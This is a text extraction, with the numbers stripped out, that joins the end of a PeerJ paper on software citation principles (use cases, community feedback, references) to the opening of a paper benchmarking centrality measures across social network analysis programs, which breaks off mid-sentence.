mechanism to look it up. publisher wants to publish a software paper this case asks what information regarding software is needed for a publisher who wants to publish a paper describing that software. requirements: � name of software � names of software authors/contributors � location/repository � citable doi of software � format for citing software in jats, for example, as well as references in the text itself publisher who wants to publish papers that cite software this case asks what information regarding software is needed for a publisher who wants to publish papers that cite that software. requirements for publisher: � name of software � names of software authors/contributors � location/repository � citable doi of software � format for citing software in, e.g., jats, as well as references in the text itself smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ indexer (e.g., scopus, wos, scholar, ms academic search) who wants to build a catalog of software provide an index over the software that is used within the research domain. track how that software is being used by different groups of researchers and to what ends. requirements: � uniquely identify pieces of software used by the research literature � connect authors and organizations to that software � connect various software versions together domain group (e.g., ascl, biocaddie), libraries, and archives (e.g., university library, laboratory archive, etc.) wants to build a catalog/registry of institutional or domain software there are two different examples here: one is building a catalog/archive of software produced by those affiliated with the institution. the other is along the lines of sayeed choudhury’s note that “data are the new special collections.” an institution may choose to build a catalog/archive of many things within a single topic or subject in order to secure all the software on a certain topic or build a collection that may draw users to their establishment, much like special collections now do for university libraries and archives. repository showing scientific impact of holdings a repository that archives and/or maintains a collection of software. the repository would like to address usage and impact of software in its holding. usage would aid potential users whether the software is being actively maintained or developed or has been superseded. both would help repository know how to direct resources, e.g., maintenance, training etc. this is similar to the case of a funder wanting to know the impact of funded work. requirements: � code name, or a unique identifier � relationships to previous versions � connect to repository � connect to research funder who wants to know how software they funded has been used this use case is similar to “repository showing scientific impact of holdings”, where a funder wants to find out the use and impact and software that they supported. it is also similar to “researcher who wants to know who uses the researcher’s software.” evaluator or funder wants to evaluate contributions of a researcher in this use case, an evaluator (e.g., academic administrator) or funder wants to evaluate the contributions of a researcher who develops software. this case is related to those smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where researchers want to get credit for software development, or where organizations want to evaluate the impact of software itself. reference management system used by researchers to author a manuscript reference management systems may need to be updated to internally understand that their is a software reference type, and to be able to output references to software in common formats. requirements for reference manager: � names of software authors/contributors � software version number and release date � location/repository � citable doi of software or paper recommended for citation � format for citing software in citation metadata file � citation metadata tags embedded in doi landing page/software project page for easy ingest possible steps: . reference management system such as endnote, mendeley, zotero, etc. builds affordances for software references. . 
researcher finds software citation and adds it to their reference manager library, by (a) importing from the citation file (e.g., bibtex, ris), or (b) clicking on, e.g., an “add to zotero library” widget in web browser. . researcher writes a paper and uses the reference manager to generate citations or bibliography. repository wants to publish mixed data/software packages domain and institutional data repositories have both data and software artifacts, and want to link these together in a provenance trace that can be cited. sometimes the software is a separately identified artifact, but at other times software is included inside of data packages, and the researcher wants to cite the combined product. use cases not adopted in the table researcher who benchmarks someone else’s software with or without modification on one or many hardware platforms for publication this case describes the need for a researcher who has contributed to software (by design, software engineering, development, testing, patching, documentation, training, evangelizing, etc.) to have their software work recognized by their employer or colleagues for the purpose of career advancement and increased professional reputation. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ requirements for researcher: � name of software � names of software authors/contributors � software version number and release date � location/repository � citable doi of software or paper recommended for citation � format for citing software in source code or citation metadata file possible steps: . software developers create citation file and associate with source code release/repository. . researcher finds and uses software in the development of new software. . researcher identifies citation metadata file (e.g., citation file) associated with downloaded/installed software source code or in online repository/published location. citation file includes necessary citation metadata. citation file may include bibtex entry, suggested citation format. . researcher cites software in source code, documentation, or other metadata-containing file. after review of this use case, we decided that based on the title this falls under use case , where a researcher uses someone else’s software for a paper. unlike use case , which is general in terms of the use of software, here the use leads to a benchmarking study—but the outcome in both cases is a paper that needs to cite the software. researcher who wants to publish about a piece of software the research wants to publish about a version of software they have produced. a key part of this use case is to be able to connect the given narrative to a specific version of the software in questions and connect that in large story. requirements: � name of software � names of software authors/contributors � location/repository � citable doi of software � links to older versions of software this is similar to use case , other than the fact that the software developer(s) and paper author(s) will likely be the same person/people here. researcher wants to record the software that generated some data this is the case where a researcher is using some software to perform an analysis, either of a physical sample or of data. the researcher needs to know which version was used, for smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ example in case a bug was fixed. 
note that knowing the software and its version is not sufficient to determine the “conditions” of the analysis, but they are essential. requirement: the analysis, or the generated data, has information about the software used. this is also similar to use case , except in that case the research output is a paper, while here the output is a dataset. researcher who wants to reproduce experience of use of a particular software implementation in context researcher is engaged in historical/cultural research, e.g., a study of video games as cultural artifacts. requirements: � name of software � software version number � documentation of the execution environment/context � location/repository for virtual machine (or equivalent) comprising both software and execution environment/context � persistent identifier associated with virtual machine instance (or equivalent) comprising both software and execution environment/context possible steps: . researcher obtains persistent id from citation . research uses a persistent id resolution service to resolve id to a location of an executable vm instance in a repository . researcher obtains vm in the repository, executes it, and interacts with software this overlaps use case (reproducing analysis), and so we decided not to include this as a distinct use case. appendix c feedback following force this appendix contains a record of comments made by the force community on the draft software citation principles, either directly via hypothesis on the draft document (https://www.force .org/softwarecitation-principles) posted following the force conference (https://www.force .org/meetings/force ) or via github issues (https://github.com/force /force -scwg/issues), and the responses to these comments. on unique identification i know this suggestion of a single unique identifier comes from the doi perspective where it works pretty well, but i’m wondering if something different in the way of identification should be used for software. for creative works generally there is the frbr model smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.force .org/softwarecitation-principles https://www.force .org/meetings/force https://github.com/force /force -scwg/issues http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (https://en.wikipedia.org/wiki/functional_requirements_for_bibliographic_records) which defines several levels for a creative entity—“work,” “expression,” “manifestation,” and “item.” i think something along these lines are particularly relevant for software—it is useful to be able to locate all uses of a particular piece of software no matter what version (the “work” level—software identified by a particular name and purpose over a period of time), but it is also important to specify the particular version used in any given work (“expression”—the source code at the time of use) and in some cases also the platform (“manifestation”—the compiled bytes including libraries, for example a docker image). “item” probably isn’t relevant for software. that is, i think a software citation perhaps could use three distinct unique identifiers, one for the work itself, one for the specific version (source code), and possibly an additional one for the actual downloadable binary image that can be run. rather than leave it implicit i think recognizing the different levels of citable record would be helpful here. #f sc reply: i interpret the requirement for “global uniqueness” as referring to the identifier itself. 
two different people can have the same name (not globally unique) but cannot share a single orcid (globally unique). global uniqueness of the identifier does not preclude multiple identifiers pointing to the same person. i think the suggestion of differentiating between different software expressions/manifestations/items is a reasonable one, but i don’t think it relaxes the requirement for identifiers to be globally unique. our response: we agree that there are valid points here, but on balance we don’t feel that the rewards from implementing this outweigh the practical challenges. on accessibility should this document address this in further detail? for example, “permit and facilitate access” could be explored further. should this be done through open access licensing? repositories? who’s responsible for providing this access? i am also wondering if this is a separate issue since “citing” traditionally pointed to publications but did not necessarily address access. doi, for example is stated, but doesn’t guarantee “access,” so does this simply restating point , or should it provide something new? our response: we agree that accessibility should receive further attention, which the follow-on group focusing on implementation will provide. however, this is out of scope for the document outlining the principles. to the second point, accessibility provides information about access, but does not guarantee access itself (e.g., paywalled article). on specificity i am wondering if this should be folded into number “unique identification.” both seem to deal with the issue of identification and access. our response: a unique software identifier can point to the specific version/variant of software, but it can also identify other things (collection of versions, repository, etc.), smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://en.wikipedia.org/wiki/functional_requirements_for_bibliographic_records http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ while this principle deals with the need to identify the specific version of software used (via citation). on academic credit a lot of software that were developed by non-academic engineers also contribute to academic research indirectly. their names and contributions should also be credited. so removing “academic” makes more sense? reply: this is a good point, though i think academic and non-academic credit are different, so perhaps we can add to this regarding non-academic credit, rather than removing “academic.” reply: i agree with daniel on this. keep academic and add non-academic. our response: we’ve made the bullet more general, just about credit, discussing academic credit and adding a sentence about non-academic credit as well. on citations in text although the focus here is on citations in the references, as a publisher, our experience is that most common practice of “citation” of data and software for authors is typically in the main body of the text. in order to encourage software to be treated and valued as a first-class research object, it is important that citations to it be positioned in the references as citations to articles and books are. however, it would be a missed opportunity if we did not leverage current practices of authors. this will also likely arise during implementation, as it has for the data citation implementation publisher early adopters pilot. this could be addressed in future work on implementation. 
our response: in the principles, we propose that software should be cited in the references list, to recognize the primary role of software in research. however, this practice is not mutually exclusive with also referencing/citing software in the main body of a paper—as long as the software is cited in the references. on unique identification clearer instructions will be needed for authors on which version to cite. for biomed central journals, we ask authors to cite two versions of the software, an archived version (e.g., on zenodo) as well as the current version (e.g., on github). this is to ensure accessibility. however, if repositories and archives were to include a persistent link to the current version of the software, publishers could then instruct authors to cite only software with a uid, which wouldn’t point to a current version, but would point to the version(s) used and would be a more accurate version of scientific record. related to this point is the idea of group object identifiers. a need for group identifiers has been identified in the area of data (e.g., in the case of meta-analyses), and one could also identify a use case for these in the case of software, collecting metadata around all versions of a given software package. see blog here (https://blog. datacite.org/to-better-understand-research-communication-we-need-a-groid-group- object-identifier/). smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://blog.datacite.org/to-better-understand-research-communication-we-need-a-groid-group-object-identifier/ https://blog.datacite.org/to-better-understand-research-communication-we-need-a-groid-group-object-identifier/ https://blog.datacite.org/to-better-understand-research-communication-we-need-a-groid-group-object-identifier/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ our response: we recommend citing the specific version of the software that was used. we expect that the unique identifier (e.g., doi) will point to a landing page that directs to the repository/current version. however, this is more of a convenience issue that the software developers should address, rather than the author citing the software they used. on future work for implementation we would recommend both consulting with adopters as well as developing metadata standards simultaneously rather than developing metadata standards and then pursuing early adopters implementation. the work early adopters are doing now for data citation will be able to be leveraged for software citation and the changes needed to do so could happen now. there is no need to wait on approval of new tagging for a specific metadata standard. many publishers will have their own preferred metadata standards and so implementation could begin now with publishers, as long as we know what we want to capture. future implementation groups might also consider levels of contribution. this is particularly relevant for software. who is considered an author? for example, to what extent should authors of pull requests receive attribution? this might be considered in an faqs group, or possibly an early adopters group. our response: we agree that metadata standards should be developed with the input of adopters, and have updated this text accordingly. additional thoughts (not sure what section this applies to) the principles do not address virtual machines. as these are becoming more common and relevant when addressing the reproducibility of research, it is important this “form” of software is acknowledged. 
the question remains in which cases should authors cite the current version, which the static archived version, and in which the virtual machine? in this way software is very much a unique evolving research object and might not fit perfectly into the same citation practices and structure as other research objects. in addition, software citation could possibly occur within the virtual machine. this could be added as a use case. our response: we feel this has been addressed in section . , with the explicit addition of virtual machines in addition to executables and containers. this is also an issue that should be addressed further by the follow-on implementation working group. on persistence of identifier vs. persistence of software the persistence principle outlined in ( ) is a key element in making software citeable. where software has become part of the record of science not only the identifier and metadata of the software should be persistent, it should also be the goal to keep a persistent copy of the source code, where applicable. this links with the accessibility principle ( ). there are still many open questions about how to resolve package dependencies in the long term, therefore i would not make the persistent access to code a hard smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ requirement but may add something more specific towards preserving the record of science. our response: our goal is for software citations to point to (persistent) archived source code, but we are not—nor could we—require this. granularity of the citation one of the key issues with any citation, whether document, individual, or software is the specificity of what is being cited. in the case of publications, there is almost zero specificity most of the time. it’s very easy to cite an entire package even though one function was used. part of this problem is being solved in the python world through this project (https://github.com/duecredit/duecredit). any citation should have the ability to specify more than just the obvious, but even the obvious would be a good starting point. the citation/url should therefore allow for greater specificity within a code base. in general though, a provenance record of the workflow would be significantly more useful than a citation from a research perspective. our response: we agree that greater specificity is desirable in some cases, but we do not believe this rises to the level of what should be specified or discussed in the principles at this time. “software citations should permit : : : access to the software itself” under the “access” header, the data declaration states that: data citations should facilitate access to the data themselves. under the same header, the software declaration states: software citations should permit and facilitate access to the software itself. the addition of “permit” suggests that software citations should also grant the user with permission to access the software. is this intentional? it doesn’t seem like a good idea to make access a requirement for discovery, so “permit” might not be helpful in this sentence. our response: to avoid confusion, we removed “permit and” from the accessibility principle. access to software: free vs commercial the section talks about software that is “free” as well as “commercial” software. 
i am not sure whether this is about free as in freedom (or just gratis or freely available), since it is compared with commercial software, which is unrelated in general, see http://www.gnu. org/philosophy/words-to-avoid.html#commercial. i suppose that “free” should be replaced by “gratis” and “commercial” be replaced by “non-free” in that section. our response: we think this is sufficiently clear as written. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/duecredit/duecredit http://www.gnu.org/philosophy/words-to-avoid.html#commercial http://www.gnu.org/philosophy/words-to-avoid.html#commercial http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ acknowledgements while d. s. katz prepared this material while employed at the nsf, any opinion, finding, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the nsf. additional information and declarations funding work by d. s. katz was supported by the national science foundation (nsf) while working at the foundation. work by k. e. niemeyer was supported in part by the nsf under grant aci- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nsf: aci- . competing interests arfon m. smith is an employee of github, inc., san francisco, california. author contributions � arfon m. smith wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � daniel s. katz wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � kyle e. niemeyer wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. data deposition the following information was supplied regarding data availability: the research in this article did not generate, collect or analyse any raw data or code. references aas editorial board. . policy statement on software. available at http://journals.aas.org/ policy/software.html (accessed february ). ahalt s, carsey t, couch a, hooper r, ibanez l, idaszak r, jones mb, lin j, robinson e. . nsf workshop on supporting scientific discovery through norms and practices for software and data citation and attribution. technical report. arlington: national science foundation. available at http://dl.acm.org/citation.cfm?id= . allen a, berriman gb, duprie k, mink j, nemiroff r, robitaille t, shamir l, shortridge k, taylor m, teuben p, wallin j. . improving software citation and credit. technical report. available at http://arxiv.org/abs/ . [cs.dl]. barnes n, jones d, norvig p, neylon c, pollock r, jackson j, stodden v, suber p. . science code manifesto. available at http://sciencecodemanifesto.org (accessed april ). smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://journals.aas.org/policy/software.html http://journals.aas.org/policy/software.html http://dl.acm.org/citation.cfm?id= http://arxiv.org/abs/ . http://sciencecodemanifesto.org http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bechhofer s, buchan i, roure dd, missier p, ainsworth j, bhagat j, couch p, cruickshank d, delderfield m, dunlop i, gamble m, michaelides d, owen s, newman d, sufi s, goble c. . why linked data is not enough for scientists. future generation computer systems ( ): – doi . /j.future. . . . chue hong n. . publish or be damned? an alternative impact manifesto for research software. 
available at http://www.software.ac.uk/blog/ - - -publish-or-be-damned-alternative- impact-manifesto-research-software (accessed february ). credit. . consortia advancing standards in research administration information. available at http://casrai.org/credit (accessed february ). data citation synthesis group. . joint declaration of data citation principles. martone m. (ed.). final document. san diego: force . available at https://www.force .org/group/joint- declaration-data-citation-principles-final. fox p, signell r. . nsf geo-data informatics: exploring the life cycle, citation and integration of geo-data workshop report. final document. troy: rensselaer polytechnic institute. available at http://tw.rpi.edu/web/workshop/community/geodata . gent i, jones c, matthews b. . guidelines for persistently identifying software using datacite. a jisc research data spring project. available at http://rrr.cs.st-andrews. ac.uk/wp-content/uploads/ / /guidelines-software-identification.pdf (accessed april ). gil y, ratnakar v, garijo d. . ontosoft: capturing scientific software metadata. in: proceedings of the eighth acm international conference on knowledge capture (k-cap). new york: acm. github. . making your code citable with github & zenodo. available at https://guides.github. com/activities/citable-code/ (accessed march ). gutzman k, konkiel s, white m, brush m, ilik v, conlon m, haendel m, holmes k. . attribution of work in the scholarly ecosystem. figshare doi . /m .figshare. .v . hannay je, langtangen hp, macleod c, pfahl d, singer j, wilson g. . how do scientists develop and use scientific software? in: proceedings icse workshop on software engineering for computational science and engineering, secse. piscataway: ieee, – doi . /secse. . . howison j, bullard j. . software in the scientific literature: problems with seeing, finding, and using software mentioned in the biology literature. journal of the association for information science and technology ( ): – doi . /asi. . huang y-h, rose pw, hsu c-n. . citing a data repository: a case study of the protein data bank. plos one ( ):e doi . /journal.pone. . ison j, kalaš m, jonassen i, bolser d, uludag m, mcwilliam h, malone j, lopez r, pettifer s, rice p. . edam: an ontology of bioinformatics operations, types of data and identifiers, topics and formats. bioinformatics ( ): – doi . /bioinformatics/btt . jackson m. . how to cite and describe software. available at http://www.software.ac.uk/how- cite-and-describe-software (accessed february ). jackson m. . oh research software, how shalt i cite thee? available at http://www.software.ac. uk/blog/ - - -oh-research-software-how-shalt-i-cite-thee (accessed february ). jackson i, schwarz c. . debian policy manual. version . . . . available at https://www. debian.org/doc/debian-policy/ch-controlfields.html (accessed april ). smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.future. . . 
http://www.software.ac.uk/blog/ - - -publish-or-be-damned-alternative-impact-manifesto-research-software http://www.software.ac.uk/blog/ - - -publish-or-be-damned-alternative-impact-manifesto-research-software http://casrai.org/credit https://www.force .org/group/joint-declaration-data-citation-principles-final https://www.force .org/group/joint-declaration-data-citation-principles-final http://tw.rpi.edu/web/workshop/community/geodata http://rrr.cs.st-andrews.ac.uk/wp-content/uploads/ / /guidelines-software-identification.pdf http://rrr.cs.st-andrews.ac.uk/wp-content/uploads/ / /guidelines-software-identification.pdf https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ http://dx.doi.org/ . /m .figshare. .v http://dx.doi.org/ . /secse. . http://dx.doi.org/ . /asi. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bioinformatics/btt http://www.software.ac.uk/how-cite-and-describe-software http://www.software.ac.uk/how-cite-and-describe-software http://www.software.ac.uk/blog/ - - -oh-research-software-how-shalt-i-cite-thee http://www.software.ac.uk/blog/ - - -oh-research-software-how-shalt-i-cite-thee https://www.debian.org/doc/debian-policy/ch-controlfields.html https://www.debian.org/doc/debian-policy/ch-controlfields.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ jones mb, smith am, cabunoc mayes a, boettiger c. . minimal metadata schemas for science software and code, in json and xml. available at https://github.com/codemeta/ codemeta (accessed march ). katz ds. . transitive credit as a means to address social and technological concerns stemming from citation and attribution of digital products. journal of open research software ( ):e doi . /jors.be. katz ds, choi s-ct, lapp h, maheshwari k, löffler f, turk m, hanwell m, wilkins-diehr n, hetherington j, howison j, swenson s, allen g, elster a, berriman b, venters c. . summary of the first workshop on sustainable software for science: practice and experiences (wssspe ). journal of open research software ( ):e doi . /jors.an. katz ds, choi s-ct, wilkins-diehr n, chue hong n, venters cc, howison j, seinstra fj, jones m, cranston k, clune tl, de val-borro m, littauer r. a. report on the second workshop on sustainable software for science: practice and experiences (wssspe ). journal of open research software ( ):e doi . /jors. . katz ds, choi s‐ct, niemeyer ke, hetherington j, löffler f, gunter d, idaszak r, brandt sr, miller ma, gesing s, jones nd, weber n, marru s, allen g, penzenstadler b, venters cc, davis e, hwang l, todorov i, patra a, de val-borro m. b. report on the third workshop on sustainable software for science: practice and experiences (wssspe ). technical report. available at http://arxiv.org/abs/arxiv: . [cs.se]. katz ds, smith am. . implementing transitive credit with json-ld. journal of open research software :e doi . /jors.by. knepley mg, brown j, mcinnes lc, smith bf. . accurately citing software and algorithms used in publications. figshare doi . /m .figshare. .v . lipson c. . cite right, second edition: a quick guide to citation styles–mla, apa, chicago, the sciences, professions, and more, chicago guides to writing, editing, and publishing. chicago: university of chicago press. malone j, brown a, lister al, ison j, hull d, parkinson h, stevens r. . the software ontology (swo): a resource for reproducibility in biomedical data analysis, curation and digital preservation. journal of biomedical semantics ( ): – doi . / - - - . 
mayernik m, maull k, hart d. . tracing the use of research resources using persistent citable identifiers. poster presented at nsf si pi meeting, arlington, va. available at https://share.renci. org/si pi / _si pi_posters/mayernik_si poster_feb .pdf (accessed march ). mcadoo t. . how to cite software in apa style. available at http://blog.apastyle.org/apastyle/ / /how-to-cite-software-in-apa-style.html. morin a, urban j, adams pd, foster i, sali a, baker d, sliz p. . shining light into black boxes. science ( ): – doi . /science. . norén l. . invitation to comment on a proposal for a cohesive research software citation- enabling platform. available at http://astronomy-software-index.github.io/ -workshop/ (accessed february ). parsons ma, duerr r, minster j-b. . data citation and peer review. eos, transactions american geophysical union ( ): – doi . / eo . rowe br, wood dw, link an, simoni da. . economic impact assessment of nist’s text retrieval conference (trec) program. final report. research triangle park: rti international. available at http://trec.nist.gov/pubs/ .economic.impact.pdf (accessed april ). software attribution for geoscience applications (saga). . software for science: getting credit for code. available at https://geodynamics.org/cig/projects/saga/ (accessed april ). smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/codemeta/codemeta https://github.com/codemeta/codemeta http://dx.doi.org/ . /jors.be http://dx.doi.org/ . /jors.an http://dx.doi.org/ . /jors. http://arxiv.org/abs/arxiv: . http://dx.doi.org/ . /jors.by http://dx.doi.org/ . /m .figshare. .v http://dx.doi.org/ . / - - - https://share.renci.org/si pi / _si pi_posters/mayernik_si poster_feb .pdf https://share.renci.org/si pi / _si pi_posters/mayernik_si poster_feb .pdf http://blog.apastyle.org/apastyle/ / /how-to-cite-software-in-apa-style.html http://blog.apastyle.org/apastyle/ / /how-to-cite-software-in-apa-style.html http://dx.doi.org/ . /science. http://astronomy-software-index.github.io/ -workshop/ http://dx.doi.org/ . / eo http://trec.nist.gov/pubs/ .economic.impact.pdf https://geodynamics.org/cig/projects/saga/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sandve gk, nekrutenko a, taylor j, hovig e. . ten simple rules for reproducible computational research. plos computational biology ( ):e doi . /journal.pcbi. . soergel daw. . rampant software errors may undermine scientific results [version ; referees: approved]. f research : doi . /f research. . . software credit workshop. . software credit workshop. available at http://www.software.ac. uk/software-credit (accessed april ). starr j, castro e, crosas m, dumontier m, downs rr, duerr r, haak l, haendel m, herman i, hodson s, hourclé j, kratz je, lin j, nielsen lh, nurnberger a, proell s, rauber a, sacchi s, smith a, taylor m, clark t. . achieving human and machine accessibility of cited data in scholarly publications. peerj computer science :e doi . /peerj-cs. . sufi s, chue hong np, hettrick s, antonioletti m, crouch s, hay a, inupakutika d, jackson m, pawlik a, peru g, robinson j, carr l, de roure d, goble c, parsons m. . software in reproducible research: advice and best practice collected from experiences at the collaborations workshop. in: proceedings st acm sigplan workshop on reproducible research methodologies and new publication models in computer engineering (trust ’ ). edinburgh: acm, : – : doi . / . . van de sompel h, payette s, erickson j, lagoze c, warner s. . 
rethinking scholarly communication: building the system that scholars deserve. d-lib magazine : . available at http://www.dlib.org/dlib/september /vandesompel/vandesompel.html.
ward g, baxter a. . distributing python modules. available at https://docs.python.org/ . /distutils/setupscript.html#additional-meta-data (accessed august ).
white o, dhar a, bonazzi v, couch j, wellington c. . nih software discovery index meeting report. nih. available at http://www.softwarediscoveryindex.org/ & https://gist.github.com/mhucka/ ea e a dbd d b b .
wickham h. . r packages. first edition. sebastopol: o'reilly media.
wilson g, aruliah da, brown ct, chue hong np, davis m, guy rt, haddock shd, huff kd, mitchell im, plumbley md, waugh b, white ep, wilson p. . best practices for scientific computing. plos biology ( ):e doi . /journal.pbio. .
wilson r. . encouraging citation of software–introducing citation files. available at http://www.software.ac.uk/blog/ - - -encouraging-citation-software-introducing-citation-files (accessed february ).

are we in agreement? benchmarking and reliability issues between social network analytic programs
philip j. murphy, middlebury institute of international studies, monterey, ca, usa
yufei wang, middlebury institute of international studies, monterey, ca, usa
karen t. cuenco, university of pittsburgh, pittsburgh, pa, usa
abstract
reliability and validity are key concerns for any researcher. we investigate these concerns as they apply to social network analysis programs. six well-used and trusted programs were compared on four common centrality measures (degree, betweenness, closeness, and eigenvector) under a variety of network topographies. we identify notable inconsistencies between programs that may not be apparent to the average user of these programs. specifically, each program may have implemented a variant of a given measure without informing the user of its characteristics. this presents an unnecessary obfuscation for analysts seeking measures that are best suited to the idiosyncrasies of their data, and for those comparing results between programs. under such a paradigm, the terms in use within the social network analysis community become less precise over time and diverge from the original strength of network analysis: clarity.
acknowledgements
the authors would like to thank elma paulauskaite and maizy cuenco for their help in putting together this research. this work was funded in part through a grant from the national institutes of health: grant number nidcr r de .
authors
philip j. murphy, middlebury institute of international studies, monterey, ca, usa. yufei wang, middlebury institute of international studies, monterey, ca, usa. karen t. cuenco, department of human genetics, university of pittsburgh, pa, usa. correspondence concerning this work should be addressed to philip j. murphy, middlebury institute of international studies, pierce st., monterey ca usa, pjmurphy@miis.edu; phone: - - ; fax: - -
introduction
an important part of the appeal of social network analysis originates from the incorporation of mathematical descriptions for social relations. this has made it possible to provide clear and unambiguous definitions for concepts relating to relational structures. the clarity of communication that resulted from this intersection of mathematics and social sciences has been credited with much of the field's early growth (freeman ). as freeman relates, "[from] the start, contributions to social network analysis were often couched in mathematical terms. the relative precision of these mathematical treatments gave social networks an advantage. because of that precision, the network field did not generate the same kinds of quibbles and misunderstandings over terms and concepts that lead to conflict in fields that are wedded to a natural language" ( ).
the mathematical core of social network analysis has delivered the dual benefits of precision and flexibility. equations are clear to the point that those who were interested in the topic could build upon one another's work with minimal need for clarification. but mathematical definitions are also general enough to allow for their application in a variety of relational contexts. the structural measures that form the core of social network analysis have thereby proven to be compelling in a variety of contexts and interests. the logarithmic proliferation in where and how social network analysis has been applied (otte and rousseau , freeman ) is testament to the scalability of the field.
the diverse purposing of social network analysis has been mirrored by a corresponding proliferation in the number and variety of software packages that are available today in the field of social network analysis. although software developers and programmers have put a great deal of effort into producing network analytic software that is suited to a wide variety of needs and applications, no single piece of software is generally applicable to every situation. software packages have been optimized for efficiency, analytic variety, analytic specificity, ease of use, specialized data handling, greater capacity for visualization, and for terminology and concepts that are tailored to a particular end-user. software also differs in style of user interface, method of reporting, and even the default methods for scaling output.
as the available packages continue to diversify, their content is also converging. however, the question of whether the analytic functions across programs are truly equivalent and exchangeable arises. are the names being used to identify each function explicit in what they identify, or are they only referring to a generalized class of functions?
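as a preview of the kind of divergence documented in the results below, consider a deliberately small sketch of one such ambiguity: an undirected graph with a self-loop, and three defensible conventions for reporting "degree centrality" that all travel under the same name. the edge list and the convention labels are invented for this illustration and are not drawn from any particular package.

```python
# toy illustration: three defensible conventions for the "same" measure, degree
# centrality on an undirected graph with a self-loop, give three different
# answers. the edge list and convention names are invented for this example.

edges = [("a", "b"), ("a", "c"), ("a", "a")]        # ("a", "a") is a loop

def degree(edges, node, loops="ignore"):
    """degree of `node`; `loops` is 'ignore', 'count_once', or 'count_twice'."""
    loop_value = {"ignore": 0, "count_once": 1, "count_twice": 2}[loops]
    d = 0
    for u, v in edges:
        if u == v == node:          # self-loop at the node of interest
            d += loop_value
        elif node in (u, v):        # ordinary incident edge
            d += 1
    return d

for convention in ("ignore", "count_once", "count_twice"):
    print(convention, degree(edges, "a", convention))
# prints 2, 3, and 4: same data, same measure name, three defensible results
```

each convention is defensible on its own terms, which is precisely why an unlabelled choice between them matters to an analyst comparing output across packages.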
naming conventions are important. the developers of network analytic soft- ware are faced with decisions about how they should implement a particular analytic function. some software developers may choose to incorporate the ability to handle common topological features of social networks (e.g., loops, multiple compo- nents) by default, while others may choose a stricter interpretation of how the measure or algorithm should perform. under such a paradigm, the terms in use within the so- cial network analysis community become less precise over time and diverge from the original strength of network analysis: clari- ty. it is possible that a measure or algo- rithm differs by implementation in order to address some given scenario or feature of network topology, and that it therefore bears unique attributes that constitute a trade-off at some level. it is therefore valu- able to both analysts and the social net- work analysis community for any such dif- ferences to be explicit, or systematized. the issue of whether two software implementations produce the same measures is especially important when us- ing two programs in concert. in such situa- tions, consistency of output indicates that the user is introducing a minimum of vari- ability when moving from one program to benchmarking and reliability issues connections insna.org | issues & | volume | another. the equivalency of network met- rics is important as small variations in such basic measures may translate into large dif- ferences on more complex algorithms. however, procedural dissimilarities in programs’ calculations of measures can be difficult to identify and frequently lack documentation. differences in how various soft- ware programs provide output constitute a barrier to assessing consistency of measures from program to program. the variety in default output styles (e.g., raw scores, normalized scores, scalar multi- plied output) makes it difficult to visually compare raw output. even if there were to be no meaningful difference in the infor- mation provided in the output, the empiri- cal differences that are evident on casual inspection make such a judgment more dif- ficult to establish. the numbers may look different, but in many cases the user would never know just by visual inspection. table : analytic interfaces used in this study our primary focus is an assessment of inter-program reliability and three relat- ed questions. are the various software pack- ages producing consistently equiva- lent results? if not, how do they differ? under what conditions do the centrality outputs diverge, if divergences exist? to assess inter-program reliability, we focused on the basic building block of network analysis: node centrality. specifi- cally, the investigation involved the four most commonly applied centrality measures: degree, betweenness, closeness, and eigenvector (valente et al. ). such measures are often fundamental to social network analysis. here, we evaluate and report on the consistency of basic measures of node centrality from across various software platforms in standardized simula- tions. materials and methods six software packages for social network analysis were compared in terms of their calculations of four basic measures of node centrality in each of four networks. we se- lected popular network analytic software that are self-contained (ucinet, pajek, ora, and gephi), or available through cran r archive (sna and igraph) packag- es (table , below). 
measures the “big four” centrality measures (degree, betweenness, closeness, and eigenvector centrality) were calculated using each ana- the program pajek does not include a measure titled eigenvector centrality. in cases of undirected networks, pajek’s “hubs and authorities” measure is analogous to eigenvector centrality and was used for the purpose of comparison. version source ucinet . http://www.analytictech.com/ pajek . http://pajek.imfm.si/ ora-netscenes . . . . http://www.casos.cs.cmu.edu/projects/ora/ gephi . . http://gephi.org/ sna . - http://www.statnet.org/ igraph . . http://igraph.org/ connections benchmarking and reliability issues | volume | issues & | insna.org lytic interface. these measures were se- lected because they are basic measures that are frequently used alone for analytic in- ference, as well as functioning as constitu- ent parts of more complex algorithms. var- iability in these measures may lead to downstream variation in analytic results for more complex algorithms. some pro- grams produce output in multiple formats (e.g., raw, normalized, scaled). when pos- sible, similarly scaled output was com- pared (table , below). table : output scaling centrality measures were deemed to be optimally correspondent if the pear- son correlation coefficient comparing two centrality values was . . the closer the correlation is to the optimally con- sistent value and when scatterplots lie along a ° line, the better the centrality values concur between software calcula- 